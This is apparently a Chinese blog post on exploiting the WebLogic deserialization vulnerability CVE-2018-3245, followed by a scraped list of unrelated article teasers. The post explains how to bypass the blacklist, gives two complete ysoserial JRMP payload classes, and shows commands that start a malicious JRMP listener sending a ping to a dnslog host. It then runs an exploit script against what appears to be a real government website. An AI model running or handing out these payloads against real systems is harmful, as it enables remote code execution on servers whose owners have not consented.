weblogic反序列化漏洞 CVE-2018-3245

0x00 针对cve-2018-2893的修复

针对JRMP反序列化修复的方式依旧是增加黑名单:
黑名单package:
java.rmi.activation
sun.rmi.server
黑名单class:
java.rmi.server.UnicastRemoteObject
java.rmi.server.RemoteObjectInvocationHandler

0x01绕过方法

因为将java.rmi.server.RemoteObjectInvocationHandler添加到了黑名单中,所以只要满足继承java.rmi.server.RemoteObject,且不在黑名单之中的类对象,比如:
ReferenceWrapper_Stub
javax.management.remote.rmi.RMIConnectionImpl_Stub
com.sun.jndi.rmi.registry.ReferenceWrapper_Stub
javax.management.remote.rmi.RMIServerImpl_Stub
sun.rmi.registry.RegistryImpl_Stub
sun.rmi.transport.DGCImpl_Stub

0x02漏洞复现

使用ReferenceWrapper_Stub代码RemoteObjectInvocationHandler
payload 一:

package ysoserial.payloads;

import java.rmi.server.ObjID;
import java.util.Random;

import com.sun.jndi.rmi.registry.ReferenceWrapper_Stub;

import sun.rmi.server.UnicastRef;
import sun.rmi.transport.LiveRef;
import sun.rmi.transport.tcp.TCPEndpoint;
import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.PayloadTest;
import ysoserial.payloads.util.PayloadRunner;

/**
 *
 *
 * UnicastRef.newCall(RemoteObject, Operation[], int, long)
 * DGCImpl_Stub.dirty(ObjID[], long, Lease)
 * DGCClient$EndpointEntry.makeDirtyCall(Set, long)
 * DGCClient$EndpointEntry.registerRefs(List)
 * DGCClient.registerRefs(Endpoint, List)
 * LiveRef.read(ObjectInput, boolean)
 * UnicastRef.readExternal(ObjectInput)
 *
 * Thread.start()
 * DGCClient$EndpointEntry.(Endpoint)
 * DGCClient$EndpointEntry.lookup(Endpoint)
 * DGCClient.registerRefs(Endpoint, List)
 * LiveRef.read(ObjectInput, boolean)
 * UnicastRef.readExternal(ObjectInput)
 *
 * Requires:
 * - JavaSE
 *
 * Argument:
 * - host:port to connect to, host only chooses random port (DOS if repeated many times)
 *
 * Yields:
 * * an established JRMP connection to the endpoint (if reachable)
 * * a connected RMI Registry proxy
 * * one system thread per endpoint (DOS)
 *
 * @author mbechler
 */
@SuppressWarnings ( {
    "restriction"
} )
@PayloadTest( harness = "ysoserial.payloads.JRMPReverseConnectSMTest")
@Authors({ Authors.MBECHLER })
public class JRMPClient3 extends PayloadRunner implements ObjectPayload {

    public ReferenceWrapper_Stub  getObject ( final String command ) throws Exception {

        String host;
        int port;
        int sep = command.indexOf(':');
        if ( sep < 0 ) {
            port = new Random().nextInt(65535);
            host = command;
        }
        else {
            host = command.substring(0, sep);
            port = Integer.valueOf(command.substring(sep + 1));
        }
        ObjID id = new ObjID(new Random().nextInt()); // RMI registry
        TCPEndpoint te = new TCPEndpoint(host, port);
        UnicastRef ref = new UnicastRef(new LiveRef(id, te, false));
        ReferenceWrapper_Stub stu = new ReferenceWrapper_Stub(ref);

        return stu;
    }

    public static void main ( final String[] args ) throws Exception {
        Thread.currentThread().setContextClassLoader(JRMPClient3.class.getClassLoader());
        PayloadRunner.run(JRMPClient3.class, args);
    }
}

执行过程:
ava -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 'ping -c 1 aaaaaaawhoai.t00ls.766cba58c1dd.tu4.org'

python exploit.py wsbs.gxds.gov.cn 7001 ysoserial.jar 47.94.2xx.xxx 1099 JRMPClient3

如果目标服务器存在漏洞,会去ping,然后通过dnslog解析可查看
weblogic反序列化漏洞 cve-2018-3245_第1张图片

payload 二:
使用RMIConnectionImpl_Stub代替:RemoteObjectInvocationHandler

package ysoserial.payloads;

import java.rmi.server.ObjID;
import java.util.Random;
import sun.rmi.server.UnicastRef;
import sun.rmi.transport.LiveRef;
import sun.rmi.transport.tcp.TCPEndpoint;
import ysoserial.payloads.util.PayloadRunner;
import javax.management.remote.rmi.RMIConnectionImpl_Stub;

@SuppressWarnings ( {
    "restriction"
} )

public class JRMPClient5 extends PayloadRunner implements ObjectPayload {

    public Object getObject ( final String command ) throws Exception {

        String host;
        int port;
        int sep = command.indexOf(':');
        if ( sep < 0 ) {
            port = new Random().nextInt(65535);
            host = command;
        }
        else {
            host = command.substring(0, sep);
            port = Integer.valueOf(command.substring(sep + 1));
        }
        ObjID id = new ObjID(new Random().nextInt()); // RMI registry
        TCPEndpoint te = new TCPEndpoint(host, port);
        UnicastRef ref = new UnicastRef(new LiveRef(id, te, false));
        RMIConnectionImpl_Stub stub = new RMIConnectionImpl_Stub(ref);
        return stub;
    }

    public static void main ( final String[] args ) throws Exception {
        Thread.currentThread().setContextClassLoader(JRMPClient5.class.getClassLoader());
        PayloadRunner.run(JRMPClient5.class, args);
    }
} 
  
执行方式如上
 
  
需要ysoserial.jar exploit.py的请留言
 
  
参考链接:
 
  
https://xz.aliyun.com/t/2479#toc-3
 
  
https://www.anquanke.com/post/id/162390
 
  

                            
                        
                    
                    
                    

                    
                    
                    

                
                

                    
                

            
        
    
    

        
你可能感兴趣的:(weblogic,cve-2018-3245,java反序列化)

        

            

                
    
                    
  • JAVA反序列化深入学习(三):CommonsCollections1
                        Neolock
漏洞原理JAVA反序列化java网络安全反序列化
                        
    ApacheCommonsCollections是一个扩展了Java标准库里的Collection结构的第三方基础库,它提供了很多强有力的数据结构类型并实现了各种集合工具类。作为Apache开源项目的重要组件,被广泛运用于各种Java应用的开发。目录JAVA环境依赖版本检查依赖配置资源下载前置知识AbstractMapDecoratorTransformedMapdecoratetransform
    
                    
    • 
                    
  • 第六十二天 服务攻防-框架安全&CVE复现&Spring&Struts&Laravela&ThinkPHP
                        清歌secure
网络安全全栈学习笔记安全springstruts
                        
    第62天服务攻防-框架安全&CVE复现&Spring&Struts&Laravela&ThinkPHP知识点:中间件及框架列表:IIS,Apache,Nginx,Tomcat,Docker,K8s,Weblogic.JBoos,WebSphere,Jenkins,GlassFish,Jetty,Jira,Struts2,Laravel,Solr,Shiro,Thinkphp,Spring,Flas
    
                    
    • 
                    
  • WebLogic 作用,以及漏洞原理,流量特征与防御
                        Bigliuzi@
进阶漏洞进阶漏洞weblogic安全
                        
    WebLogic的核心作用:企业级别的应用服务器,相当于一个高性能的java环境主要功能:应用部署,事务管理,集群与负载均衡,安全控制,资源池化,消息中间件典型的使用场景:银行核心系统,电信计费平台,电商大促平台主要漏洞:T3反序列化,IIop反序列化,xml反序列化,未授权访问流量特征:T3协议攻击特征,未授权访问特征,.反序列化攻击特征危害:远程代码执行完全控制服务器(删库、安装后门)数据泄露
    
                    
    • 
                    
  • weblogic 启动常见错误解决
                        ithadoop
weblogicoracleoracleweblogic
                        
    以下是WebLogic启动常见错误及解决方案的图文汇总(基于最新实践整理):一、控制台无法访问(端口冲突)现象:浏览器访问http://localhost:7001/console失败解决步骤:检查端口占用:netstat-an|grep7001#Linuxnetstat-ano|findstr7001#Windows若端口冲突,修改config.xml中的ListenPort或终止占用进程二、节
    
                    
    • 
                    
  • 第14章 Nginx WEB服务器企业实战
                        lihuhelihu
Linux运维学习nginx前端服务器apachelinux运维云计算
                        
    万维网(WORLDWIDEWEB,WWW)服务器,也称之为WEB服务器,主要功能是提供网上信息浏览服务。目前主流的WEB服务器软件包括:Apache、Nginx、Lighttpd、IIS、Resin、Tomcat、WebLogic、Jetty。本章介绍Nginx高性能WEB服务器、Nginx工作原理、安装配置及升级、Nginx配置文件深入剖析、Nginx虚拟主机、Location案例演示、Ngin
    
                    
    • 
                    
  • WebLogic 12.1.3补丁:安全、性能与稳定性升级指南
                        凌莫凡

                        
    本文还有配套的精品资源,点击获取简介:Oracle的WebLogicServer是企业级JavaEE应用服务器,用于开发、部署和管理分布式业务应用程序。WebLogic12.1.3补丁于2018年7月17日发布,主要为了解决安全漏洞、优化性能和提升系统稳定性及兼容性。补丁包含安全修复、性能优化、稳定性增强、兼容性升级以及可能的新功能引入,而WebLogic10.3.6虽然发布于2011年,但继续获
    
                    
    • 
                    
  • weblogic简介
                        xaqw
开发语言
                        
    WebLogic是美国Oracle公司出品的一个ApplicationServer,它是一个基于JAVAEE架构的中间件。WebLogic主要用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。它将Java的动态功能和JavaEnterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。Weblogic的主要组成部分1.Domain(域):一个
    
                    
    • 
                    
  • weblogic漏洞复现(CVE-2020-2555)
                        墨痕诉清风
渗透常识研究python开发语言
                        
    漏洞环境:fofa自己找,server=weblogicport=7001一、漏洞简介该反序列化的gadget存在与coherence包中。具体可以见分析构造chain类似于common-collection的chain,可以照葫芦画瓢。mvn好像不能下载coherence包,很奇怪,直接下jar包就行。反序列化的对象,通过t3发送给weblogic即可。所以,这个只是生成payload的工具二、
    
                    
    • 
                    
  • Weblogic 简介
                        shangboerds
JavaEEweblogicjava
                        
    --StartWeblogic是什么?Weblogic是一个中间件,或者说它是一个JavaEE应用服务器。下载和安装Weblogic你可以在Google中搜索Weblogic,然后到官网去下载最新的Weblogic发行包,然后像安装其他任何软件一样安装Weblogic就可以了。在安装的时候,特别需要注意的一点是安装类型选择定制,然后选中ServerExamples。创建域(domain)域(dom
    
                    
    • 
                    
  • shiro、struts2、weblogic特征流量分析
                        桑晒.
struts网络安全web安全
                        
    文章目录一、Shiro漏洞流量特征1.**身份验证阶段的特征**2.**攻击阶段的特征**3.**检测与防御建议**二、Struts2漏洞流量特征1.**请求特征**2.**响应特征**3.**典型案例**4.**防御建议**三、WebLogic漏洞流量特征1.**XMLDecoder反序列化(CVE-2017-10271)**2.**SSRF漏洞(CVE-2014-4210)**3.**T3协议
    
                    
    • 
                    
  • 终极陷阱:Java序列化漏洞的内爆原理与防御体系重建
                        悟能不能悟
javapython开发语言
                        
    引言:被遗忘的后门2019年Equifax公司因Java反序列化漏洞导致1.43亿用户数据泄露,最终以7亿美元达成和解。令人震惊的是,问题源头竟是一个简单的序列化接口:publicclassUserSessionimplementsSerializable{privateStringsessionId;privatebyte[]sessionData;//反序列化炸弹触发器}这个看似无害的类,如何
    
                    
    • 
                    
  • Nginx+Tomcat负载均衡群集
                        昭阳~
nginxtomcat负载均衡
                        
    一、Tomcat核心技术与部署实践1.1Tomcat的演进与定位历史沿革:从Sun公司的Catalina项目演化而来(文档显示安装目录保留Catalina相关文件),由Apache软件基金会维护市场定位:轻量级开源应用服务器,在中小型系统及并发要求不高的场景替代WebSphere/WebLogic性能突破:5.x版本后性能大幅提升,Servlet/JSPAPI完全支持企业级应用(如V3版移联建站系
    
                    
    • 
                    
  • 【HW系列】—Struts_2、weblogic漏洞流量特征
                        枷锁—sha
网络安全蓝队—应急响应strutsjava后端网络web安全安全
                        
    本文仅用于技术研究,禁止用于非法用途。文章目录Struts_2漏洞特征流量特征一、请求参数特征二、请求头与内容特征三、响应特征四、关联漏洞与检测建议五、工具辅助与扩展weblogic漏洞特征流量特征一、反序列化漏洞特征二、未授权访问漏洞(如CVE-2020-14882)三、XML外部实体注入(XXE)与文件读取四、工具利用特征五、检测与防御建议Struts_2漏洞特征流量特征ApacheStrut
    
                    
    • 
                    
  • 59、服务攻防——中间件安全&CVE复现&IIS&Apache&Tomcat&Nginx
                        PT_silver
小迪安全网络安全web安全
                        
    文章目录中间件——IIS漏洞中间件——Nginx漏洞中间件——Apache中间件——Tomcat中间件:IIS、Apache、Nginx、Tomcat、Docker、Weblogic、JBoss、WebSphere、Jenkinsphp框架:Laravel、Thinkphppythonl框架:Flaskjs框架:jQueryjava框架:Struts2、Jira、spring、GlassFish中
    
                    
    • 
                    
  • Weblogic 反序列化远程命令执行漏洞 CVE-2019-2725 详解
                        Waitccy
java网络安全漏洞反序列化cve
                        
    Weblogic反序列化远程命令执行漏洞CVE-2019-2725详解一、漏洞背景2019年4月17日,国家信息安全漏洞共享平台(CNVD)收录了由中国民生银行股份有限公司报送的OracleWebLogicwls9-async反序列化远程命令执行漏洞(CNVD-C-2019-48814),对应的CVE编号为CVE-2019-2725,该漏洞危险级别为高危,CVSS分值高达9.8。WebLogicS
    
                    
    • 
                    
  • Oracle — 总结
                        无名友
Oracleoracle数据库
                        
    Oracle公司及产品概述公司背景Oracle(甲骨文)是全球领先的数据库软件和服务提供商,成立于1977年,核心产品包括:OracleDatabase:关系型数据库管理系统(RDBMS)。Java:编程语言及平台。OracleCloud:云计算服务(IaaS/PaaS/SaaS)。中间件:WebLogicServer、OracleFusionMiddleware等。Oracle数据库版本常见版本
    
                    
    • 
                    
  • 【序列化与反序列化详解】
                        wdwc2
杂记javac++python
                        
    文章目录一、序列化与反序列化是什么?1.为什么需要序列化?2.反序列化的作用二、常见的序列化格式三、不同编程语言的序列化与反序列化示例1.Python的序列化与反序列化JSON序列化Pickle序列化(仅限Python)2.Java的序列化与反序列化Java序列化Java反序列化3.C++的序列化与反序列化(使用JSON)安装JSON库C++JSON序列化C++JSON反序列化四、总结一、序列化与
    
                    
    • 
                    
  • Shell 脚本
                        牛牛的快乐时光
git服务器javascript
                        
    ./sh+目录A+目录B(AB是父子目录)./file_name.sh+父目录+子目录file_name.sh所在目录与{父目录}是平行目录目录内文件xxlbuildxxl-build.shxxl-config.shxxlbuild文件内容如下[weblogic@localhostversion]$pwd/tools/SPH_ERP/version[weblogic@localhostversio
    
                    
    • 
                    
  • java安全(五)java反序列化
                        b1gpig安全
Java安全java安全信息安全
                        
    给个关注?宝儿!给个关注?宝儿!给个关注?宝儿!1.序列化在调用RMI时,发现接收发送数据都是反序列化数据.例如JSON和XML等语言,在网络上传递信息,都会用到一些格式化数据,大多数处理方法中,JSON和XML支持的数据类型就是基本数据类型,整型、浮点型、字符串、布尔等,如果开发者希望在传输数据的时候直接传输一个对象,那么就不得不想办法扩展基础的JSON(XML)语法。比如,Jackson和Fa
    
                    
    • 
                    
  • Java反序列化触发方式
                        杜子腾1
Java安全java网络安全
                        
    反序列化触发点扩展ObjectInputStream.readObject//流转化为ObjectObjectInputStream.readUnshared//流转化为ObjectXMLDecoder.readObject//读取xml转化为ObjectYaml.load//yaml字符串转ObjectXStream.fromXML//XStream用于JavaObject与xml相互转化Obj
    
                    
    • 
                    
  • WebLogic Scripting Tool
                        a13393665983
pythonjavashell
                        
    WebLogicScriptingToolUsingtheWebLogicScriptingToolWebLogicScriptingToolUsingtheWebLogicScriptingToolThefollowingsectionsdescribetheWebLogicScriptingTool:WhatistheWebLogicScriptingTool?ModesofOperation
    
                    
    • 
                    
  • 2025年渗透测试面试题总结-拷打题库29(题目+回答)
                        独行soc
2025年渗透测试面试指南职场和发展面试linux运维服务器渗透测试网络安全
                        
    网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。目录2025年渗透测试面试题总结-拷打题库291.打点常用漏洞2.Shiro漏洞发现方法3.Shiro漏洞类型4.Weblogic权限绕过5.Fastjson漏洞原理6.Weblogic漏洞类型7.IIOP协议与类似技术8.Webshell不出网应对9.DNS协议利用10
    
                    
    • 
                    
  • 【Java代码审计】反序列化漏洞篇
                        世界尽头与你
#代码审计java开发语言安全
                        
    【Java代码审计】反序列化漏洞篇1.反序列化漏洞概述概述反序列化过程详解2.反序列化漏洞产生的必要条件3.反序列化漏洞检测方案代码审计白盒检测黑盒检测RASP检测攻击检测️4.普通反序列化漏洞5.XMLDecoder反序列化漏洞6.Java反序列化漏洞修复7.Java反序列化漏洞审计关键词1.反序列化漏洞概述概述发送方必须将要发送的Java对象序列化为字节流,接收方则需要将字节流再反序列化,还原
    
                    
    • 
                    
  • WebLogic中的SSL证书配置流程及注意事项
                        数字扫地僧
WebLogicssl网络协议网络
                        
    WebLogic是Oracle提供的企业级中间件平台,广泛应用于支持分布式系统和Java应用程序。安全性是企业级应用的重要基础,而SSL(SecureSocketsLayer)协议是保证网络通信安全的核心技术。WebLogic支持SSL,通过配置证书实现加密通信和身份验证。本文将详细介绍WebLogic中SSL证书的配置流程及注意事项,结合实际操作案例,帮助您快速掌握如何在WebLogic环境中启
    
                    
    • 
                    
  • 面试经验分享 | 成都渗透测试工程师二面面经分享
                        渗透测试老鸟-九青
想获取免费资料+zkanzz面试经验分享职场和发展web安全安全服务器区块链
                        
    目录:概况面试过程面试官的问题问题1、你觉得当前OAuth2.0下的攻击手段有哪些?结合具体案例详细讲讲问题2、php/java反序列化漏洞的原理?程序员/运维如何避免此类漏洞或如何防御?问题3、如果一台服务器被入侵后,你会如何做应急响应?问题4、目前已知哪些版本的容器有解析漏洞,具体举例。问题5、宽字符注入的原理?如何利用宽字符注入漏洞,payload如何构造?问题6、为何一个mysql数据库的
    
                    
    • 
                    
  • 2025年渗透测试面试题总结-某小米-安全工程师(题目+回答)
                        独行soc
2025年渗透测试面试指南面试职场和发展安全红蓝攻防web安全pythonjava
                        
    网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。目录小米-安全工程师一、SQL注入防御体系与预编译原理(2025版)1.1防御技术矩阵1.2预编译核心原理二、PHP与Java反序列化漏洞对比(2025攻击案例)2.1利用链差异分析2.2反序列化炸弹对抗三、SCA实现方案与灰盒/白盒实践3.1技术实现对比3.2创新方案四
    
                    
    • 
                    
  • 【jdbc】 jndi与“Java:comp/env/“语法
                        云川之下
数据库jndicomp/env
                        
    文章目录1.什么是jndi2.jndi配置2.1weblogic例子:2.2其他服务器1.什么是jndijndi的作用看起来和datasource查不多,定义一个数据源,比如更换了数据库或需要更改配置信息,我们只需要修改注册信息,代码中引入的是一个key(资源名),只要key不变,因此代码也不需要修改。传统用法,非jndi:Connectionconn=null;try{Class.forName
    
                    
    • 
                    
  • 2025年渗透测试面试题总结-某360-企业蓝军面试复盘 (题目+回答)
                        独行soc
2025年渗透测试面试指南面试职场和发展安全web安全红蓝攻防pythonjava
                        
    网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。目录360-企业蓝军一、Shiro绕WAF实战方案二、WebLogic遭遇WAF拦截后的渗透路径三、JBoss/WebLogic反序列化漏洞原理四、Fastjson漏洞检测与绕过五、PHP文件下载漏洞深入利用六、PHPdisable_function绕过原理七、云主机无内
    
                    
    • 
                    
  • 列出0 racle Forms配置文件?思维导图 代码示例(java 架构)
                        用心去追梦
java架构开发语言
                        
    OracleForms配置文件OracleForms应用程序的配置涉及到多个文件,这些文件用于定义运行时环境、数据库连接、安全设置等。以下是与OracleForms相关的常见配置文件:1.formsweb.cfg位置:通常位于/forms/server/formsweb.cfg或WebLogic域中的指定目录。用途:此文件包含启动Forms应用所需的各种参数和属性,如表单模块名称、数据库连接字符串
    
                    
    • 
                    
  • 28.Vulmap:Web 漏洞扫描与验证工具
                        白帽少女安琪拉
安全工具网络安全网络
                        
    一、项目介绍Vulmap是一款功能强大的Web漏洞扫描和验证工具,专注于对Web容器、Web服务器、Web中间件及CMS等Web程序的漏洞检测与利用。其集成了漏洞扫描(PoC)和漏洞利用(Exp)两种模式,帮助安全人员快速发现并验证目标系统的安全漏洞,适用于渗透测试、漏洞挖掘及安全评估等场景。1.1核心功能漏洞扫描(PoC模式):支持对多种Web程序(如Tomcat、WebLogic、Shiro、
    
                    
    • 
                                
  • web报表工具FineReport常见的数据集报错错误代码和解释
                                    老A不折腾
web报表finereport代码可视化工具
                                    
    在使用finereport制作报表,若预览发生错误,很多朋友便手忙脚乱不知所措了,其实没什么,只要看懂报错代码和含义,可以很快的排除错误,这里我就分享一下finereport的数据集报错错误代码和解释,如果有说的不准确的地方,也请各位小伙伴纠正一下。 
  
NS-war-remote=错误代码\:1117 压缩部署不支持远程设计 
NS_LayerReport_MultiDs=错误代码
    
                                
    • 
                                
  • Java的WeakReference与WeakHashMap
                                    bylijinnan
java弱引用
                                    
    首先看看 WeakReference 
 
wiki 上 Weak reference 的一个例子: 
 
 

	public class ReferenceTest {
	public static void main(String[] args) throws InterruptedException {
 
            WeakReference r = new Wea
    
                                
    • 
                                
  • Linux——(hostname)主机名与ip的映射
                                    eksliang
linuxhostname
                                    
    一、 什么是主机名 
无论在局域网还是INTERNET上,每台主机都有一个IP地址,是为了区分此台主机和彼台主机,也就是说IP地址就是主机的门牌号。但IP地址不方便记忆,所以又有了域名。域名只是在公网(INtERNET)中存在,每个域名都对应一个IP地址,但一个IP地址可有对应多个域名。域名类型 linuxsir.org 这样的; 
主机名是用于什么的呢? 
答:在一个局域网中,每台机器都有一个主
    
                                
    • 
                                
  • oracle 常用技巧
                                    18289753290

                                    
    oracle常用技巧   ①复制表结构和数据     create table  temp_clientloginUser   as     select distinct userid from tbusrtloginlog   ②仅复制数据   如果表结构一样   insert into  mytable  select  * &nb
    
                                
    • 
                                
  • 使用c3p0数据库连接池时出现com.mchange.v2.resourcepool.TimeoutException
                                    酷的飞上天空
exception
                                    
    有一个线上环境使用的是c3p0数据库,为外部提供接口服务。最近访问压力增大后台tomcat的日志里面频繁出现 
com.mchange.v2.resourcepool.TimeoutException: A client timed out while waiting to acquire a resource from com.mchange.v2.resourcepool.BasicResou
    
                                
    • 
                                
  • IT系统分析师如何学习大数据
                                    蓝儿唯美
大数据
                                    
    我是一名从事大数据项目的IT系统分析师。在深入这个项目前需要了解些什么呢?学习大数据的最佳方法就是先从了解信息系统是如何工作着手,尤其是数据库和基础设施。同样在开始前还需要了解大数据工具,如Cloudera、Hadoop、Spark、Hive、Pig、Flume、Sqoop与Mesos。系 统分析师需要明白如何组织、管理和保护数据。在市面上有几十款数据管理产品可以用于管理数据。你的大数据数据库可能
    
                                
    • 
                                
  • spring学习——简介
                                    a-john
spring
                                    
    Spring是一个开源框架,是为了解决企业应用开发的复杂性而创建的。Spring使用基本的JavaBean来完成以前只能由EJB完成的事情。然而Spring的用途不仅限于服务器端的开发,从简单性,可测试性和松耦合的角度而言,任何Java应用都可以从Spring中受益。其主要特征是依赖注入、AOP、持久化、事务、SpringMVC以及Acegi Security 
 
为了降低Java开发的复杂性,
    
                                
    • 
                                
  • 自定义颜色的xml文件
                                    aijuans
xml
                                    
    <?xml version="1.0" encoding="utf-8"?> <resources> <color name="white">#FFFFFF</color> <color name="black">#000000</color> &
    
                                
    • 
                                
  • 运营到底是做什么的?
                                    aoyouzi
运营到底是做什么的?
                                    
    文章来源:夏叔叔(微信号:woshixiashushu),欢迎大家关注!很久没有动笔写点东西,近些日子,由于爱狗团产品上线,不断面试,经常会被问道一个问题。问:爱狗团的运营主要做什么?答:带着用户一起嗨。为什么是带着用户玩起来呢?究竟什么是运营?运营到底是做什么的?那么,我们先来回答一个更简单的问题——互联网公司对运营考核什么?以爱狗团为例,绝大部分的移动互联网公司,对运营部门的考核分为三块——用
    
                                
    • 
                                
  • js面向对象类和对象
                                    百合不是茶
js面向对象函数创建类和对象
                                    
    接触js已经有几个月了,但是对js的面向对象的一些概念根本就是模糊的,js是一种面向对象的语言 但又不像java一样有class,js不是严格的面向对象语言 ,js在java web开发的地位和java不相上下  ,其中web的数据的反馈现在主流的使用json,json的语法和js的类和属性的创建相似 
  
下面介绍一些js的类和对象的创建的技术 
  
一:类和对
    
                                
    • 
                                
  • web.xml之资源管理对象配置 resource-env-ref
                                    bijian1013
javaweb.xmlservlet
                                    
    resource-env-ref元素来指定对管理对象的servlet引用的声明,该对象与servlet环境中的资源相关联 
<resource-env-ref>
    <resource-env-ref-name>资源名</resource-env-ref-name>
    <resource-env-ref-type>查找资源时返回的资源类
    
                                
    • 
                                
  • Create a composite component with a custom namespace
                                    sunjing

                                    
    https://weblogs.java.net/blog/mriem/archive/2013/11/22/jsf-tip-45-create-composite-component-custom-namespace 
  
When you developed a composite component the namespace you would be seeing would 
    
                                
    • 
                                
  • 【MongoDB学习笔记十二】Mongo副本集服务器角色之Arbiter
                                    bit1129
mongodb
                                    
     一、复本集为什么要加入Arbiter这个角色   回答这个问题,要从复本集的存活条件和Aribter服务器的特性两方面来说。   什么是Artiber?   An arbiter does 
not have a copy of data set and 
cannot become a primary. Replica sets may have arbiters to add a 
    
                                
    • 
                                
  • Javascript开发笔记
                                    白糖_
JavaScript
                                    
     
 获取iframe内的元素 
 
通常我们使用window.frames["frameId"].document.getElementById("divId").innerHTML这样的形式来获取iframe内的元素,这种写法在IE、safari、chrome下都是通过的,唯独在fireforx下不通过。其实jquery的contents方法提供了对if
    
                                
    • 
                                
  • Web浏览器Chrome打开一段时间后,运行alert无效
                                    bozch
Webchormealert无效
                                    
    今天在开发的时候,突然间发现alert在chrome浏览器就没法弹出了,很是怪异。 
试了试其他浏览器,发现都是没有问题的。 
开始想以为是chorme浏览器有啥机制导致的,就开始尝试各种代码让alert出来。尝试结果是仍然没有显示出来。 
这样开发的结果,如果客户在使用的时候没有提示,那会带来致命的体验。哎,没啥办法了 就关闭浏览器重启。 
  
结果就好了,这也太怪异了。难道是cho
    
                                
    • 
                                
  • 编程之美-高效地安排会议 图着色问题 贪心算法
                                    bylijinnan
编程之美
                                    
    

import java.util.ArrayList;
import java.util.Collections;
import java.util.List;
import java.util.Random;

public class GraphColoringProblem {

	/**编程之美 高效地安排会议 图着色问题 贪心算法
	 * 假设要用很多个教室对一组
    
                                
    • 
                                
  • 机器学习相关概念和开发工具
                                    chenbowen00
算法matlab机器学习
                                    
    基本概念: 
机器学习(Machine Learning, ML)是一门多领域交叉学科,涉及概率论、统计学、逼近论、凸分析、算法复杂度理论等多门学科。专门研究计算机怎样模拟或实现人类的学习行为,以获取新的知识或技能,重新组织已有的知识结构使之不断改善自身的性能。 
它是人工智能的核心,是使计算机具有智能的根本途径,其应用遍及人工智能的各个领域,它主要使用归纳、综合而不是演绎。 
 
开发工具 
M
    
                                
    • 
                                
  • [宇宙经济学]关于在太空建立永久定居点的可能性
                                    comsci
经济
                                    
     
       大家都知道,地球上的房地产都比较昂贵,而且土地证经常会因为新的政府的意志而变幻文本格式........ 
 
       所以,在地球议会尚不具有在太空行使法律和权力的力量之前,我们外太阳系统的友好联盟可以考虑在地月系的某些引力平衡点上面,修建规模较大的定居点
    
                                
    • 
                                
  • oracle 11g database control 证书错误
                                    daizj
oracle证书错误oracle 11G 安装
                                    
    oracle 11g database control 证书错误  
 
win7 安装完oracle11后打开 Database control 后,会打开em管理页面,提示证书错误,点“继续浏览此网站”,还是会继续停留在证书错误页面 
 
解决办法: 
 
是 KB2661254 这个更新补丁引起的,它限制了 RSA 密钥位长度少于 1024 位的证书的使用。具体可以看微软官方公告:
    
                                
    • 
                                
  • Java I/O之用FilenameFilter实现根据文件扩展名删除文件
                                    游其是你
FilenameFilter
                                    
    在Java中,你可以通过实现FilenameFilter类并重写accept(File dir, String name) 方法实现文件过滤功能。 
在这个例子中,我们向你展示在“c:\\folder”路径下列出所有“.txt”格式的文件并删除。        1   2   3   4   5   6   7   8   9   10   11   12   13   14   15   16 
    
                                
    • 
                                
  • C语言数组的简单以及一维数组的简单排序算法示例,二维数组简单示例
                                    dcj3sjt126com
carray
                                    
    # include <stdio.h>

int main(void)
{
	
	int a[5] = {1, 2, 3, 4, 5};
		//a 是数组的名字 5是表示数组元素的个数,并且这五个元素分别用a[0], a[1]...a[4]
	
	int i;

	for (i=0; i<5; ++i)
		printf("%d\n",
    
                                
    • 
                                
  • PRIMARY, INDEX, UNIQUE 这3种是一类 PRIMARY 主键。 就是 唯一 且 不能为空。 INDEX 索引,普通的 UNIQUE 唯一索引
                                    dcj3sjt126com
primary
                                    
    PRIMARY, INDEX, UNIQUE 这3种是一类PRIMARY 主键。 就是 唯一 且 不能为空。INDEX 索引,普通的UNIQUE 唯一索引。 不允许有重复。FULLTEXT 是全文索引,用于在一篇文章中,检索文本信息的。举个例子来说,比如你在为某商场做一个会员卡的系统。这个系统有一个会员表有下列字段:会员编号   INT会员姓名  
    
                                
    • 
                                
  • java集合辅助类 Collections、Arrays
                                    shuizhaosi888
CollectionsArraysHashCode
                                    
      
Arrays、Collections 
  
1 )数组集合之间转换 
    public static <T> List<T> asList(T... a) {
        return new ArrayList<>(a);
    } 
     a)Arrays.asL
    
                                
    • 
                                
  • Spring Security(10)——退出登录logout
                                    234390216
logoutSpring Security退出登录logout-urlLogoutFilter
                                    
           要实现退出登录的功能我们需要在http元素下定义logout元素,这样Spring Security将自动为我们添加用于处理退出登录的过滤器LogoutFilter到FilterChain。当我们指定了http元素的auto-config属性为true时logout定义是会自动配置的,此时我们默认退出登录的URL为“/j_spring_secu
    
                                
    • 
                                
  • 透过源码学前端 之 Backbone 三 Model
                                    逐行分析JS源代码
backbone源码分析js学习
                                    
    Backbone 分析第三部分  Model 
概述: Model 提供了数据存储,将数据以JSON的形式保存在 Model的 attributes里, 
但重点功能在于其提供了一套功能强大,使用简单的存、取、删、改数据方法,并在不同的操作里加了相应的监听事件, 
如每次修改添加里都会触发 change,这在据模型变动来修改视图时很常用,并且与collection建立了关联。 
    
                                
    • 
                                
  • SpringMVC源码总结(七)mvc:annotation-driven中的HttpMessageConverter
                                    乒乓狂魔
springMVC
                                    
    这一篇文章主要介绍下HttpMessageConverter整个注册过程包含自定义的HttpMessageConverter,然后对一些HttpMessageConverter进行具体介绍。 
 
HttpMessageConverter接口介绍: 
 

public interface HttpMessageConverter<T> {

	/**
	 * Indicate
    
                                
    • 
                                
  • 分布式基础知识和算法理论
                                    bluky999
算法zookeeper分布式一致性哈希paxos
                                    
       
分布式基础知识和算法理论 
BY [email protected] 
本文永久链接:http://nodex.iteye.com/blog/2103218 
  
在大数据的背景下,不管是做存储,做搜索,做数据分析,或者做产品或服务本身,面向互联网和移动互联网用户,已经不可避免地要面对分布式环境。笔者在此收录一些分布式相关的基础知识和算法理论介绍,在完善自我知识体系的同
    
                                
    • 
                                
  • Android Studio的.gitignore以及gitignore无效的解决
                                    bell0901
androidgitignore
                                    
      github上.gitignore模板合集,里面有各种.gitignore : https://github.com/github/gitignore 
